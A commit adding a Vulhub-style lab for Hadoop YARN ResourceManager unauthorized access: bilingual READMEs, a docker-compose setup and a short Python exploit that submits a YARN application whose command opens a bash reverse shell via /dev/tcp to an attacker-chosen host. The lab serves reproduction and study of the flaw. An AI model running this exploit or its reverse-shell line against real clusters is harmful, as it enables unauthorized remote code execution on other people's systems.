first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
32
hadoop/unauthorized-yarn/README.md
Normal file
32
hadoop/unauthorized-yarn/README.md
Normal file
@@ -0,0 +1,32 @@
|
||||
# Hadoop YARN ResourceManager Unauthorized Access
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Hadoop YARN (Yet Another Resource Negotiator) is Apache Hadoop's cluster resource management system. If the YARN ResourceManager is exposed to the public internet without proper access controls, an attacker can submit and execute arbitrary applications on the cluster.
|
||||
|
||||
References:
|
||||
|
||||
- <http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf>
|
||||
- <https://hadoop.apache.org/docs/r2.7.3/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html>
|
||||
|
||||
## Environment Setup
|
||||
|
||||
Execute the following command to start vulnerable Hadoop YARN environment:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the environment starts, visit `http://your-ip:8088` to access the Hadoop YARN ResourceManager WebUI.
|
||||
|
||||
## Vulnerability Reproduction
|
||||
|
||||
The exploitation method differs slightly from the original presentation. Even without a Hadoop client, you can submit tasks directly through the REST API (https://hadoop.apache.org/docs/r2.7.3/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html).
|
||||
|
||||
The exploitation process is as follows:
|
||||
|
||||
1. Set up a listener on your local machine to receive the reverse shell connection
|
||||
2. Call the New Application API to create an Application
|
||||
3. Call the Submit Application API to submit the malicious application
|
||||
|
||||
For detailed implementation, refer to the [exploit script](exploit.py).
|
||||
30
hadoop/unauthorized-yarn/README.zh-cn.md
Normal file
30
hadoop/unauthorized-yarn/README.zh-cn.md
Normal file
@@ -0,0 +1,30 @@
|
||||
# Hadoop YARN ResourceManager 未授权访问漏洞
|
||||
|
||||
Hadoop YARN(Yet Another Resource Negotiator)是Apache Hadoop的集群资源管理系统。YARN ResourceManager中存在一个未授权访问漏洞,由于缺少访问控制,未经授权的用户可以在集群上提交并执行任意应用程序。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf>
|
||||
- <https://hadoop.apache.org/docs/r2.7.3/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html>
|
||||
|
||||
## 环境搭建
|
||||
|
||||
执行如下命令启动环境:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
环境启动后,访问`http://your-ip:8088`即可看到Hadoop YARN ResourceManager的Web管理界面。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
漏洞利用方法与原始演示文稿中的方法略有不同。即使没有Hadoop客户端,也可以直接通过REST API(https://hadoop.apache.org/docs/r2.7.3/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html)提交任务执行。
|
||||
|
||||
漏洞利用过程如下:
|
||||
|
||||
1. 在本地机器上设置监听器,等待反弹shell连接
|
||||
2. 调用New Application API创建应用程序
|
||||
3. 调用Submit Application API提交恶意应用程序
|
||||
|
||||
具体实现请参考[漏洞利用脚本](exploit.py)。
|
||||
35
hadoop/unauthorized-yarn/docker-compose.yml
Normal file
35
hadoop/unauthorized-yarn/docker-compose.yml
Normal file
@@ -0,0 +1,35 @@
|
||||
services:
|
||||
namenode:
|
||||
image: vulhub/hadoop:2.8.1
|
||||
environment:
|
||||
- HDFS_CONF_dfs_namenode_name_dir=file:///hadoop/dfs/name
|
||||
- CLUSTER_NAME=vulhub
|
||||
- HDFS_CONF_dfs_replication=1
|
||||
command: /namenode.sh
|
||||
|
||||
datanode:
|
||||
image: vulhub/hadoop:2.8.1
|
||||
environment:
|
||||
- HDFS_CONF_dfs_datanode_data_dir=file:///hadoop/dfs/data
|
||||
- CORE_CONF_fs_defaultFS=hdfs://namenode:8020
|
||||
- CLUSTER_NAME=vulhub
|
||||
- HDFS_CONF_dfs_replication=1
|
||||
command: /datanode.sh
|
||||
|
||||
resourcemanager:
|
||||
image: vulhub/hadoop:2.8.1
|
||||
environment:
|
||||
- CORE_CONF_fs_defaultFS=hdfs://namenode:8020
|
||||
- YARN_CONF_yarn_log___aggregation___enable=true
|
||||
command: /resourcemanager.sh
|
||||
ports:
|
||||
- "8088:8088"
|
||||
|
||||
nodemanager:
|
||||
image: vulhub/hadoop:2.8.1
|
||||
environment:
|
||||
- CORE_CONF_fs_defaultFS=hdfs://namenode:8020
|
||||
- YARN_CONF_yarn_resourcemanager_hostname=resourcemanager
|
||||
- YARN_CONF_yarn_log___aggregation___enable=true
|
||||
- YARN_CONF_yarn_nodemanager_remote___app___log___dir=/app-logs
|
||||
command: /nodemanager.sh
|
||||
22
hadoop/unauthorized-yarn/exploit.py
Normal file
22
hadoop/unauthorized-yarn/exploit.py
Normal file
@@ -0,0 +1,22 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import requests
|
||||
|
||||
target = 'http://127.0.0.1:8088/'
|
||||
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999
|
||||
|
||||
url = target + 'ws/v1/cluster/apps/new-application'
|
||||
resp = requests.post(url)
|
||||
app_id = resp.json()['application-id']
|
||||
url = target + 'ws/v1/cluster/apps'
|
||||
data = {
|
||||
'application-id': app_id,
|
||||
'application-name': 'get-shell',
|
||||
'am-container-spec': {
|
||||
'commands': {
|
||||
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
|
||||
},
|
||||
},
|
||||
'application-type': 'YARN',
|
||||
}
|
||||
requests.post(url, json=data)
|
||||
Reference in New Issue
Block a user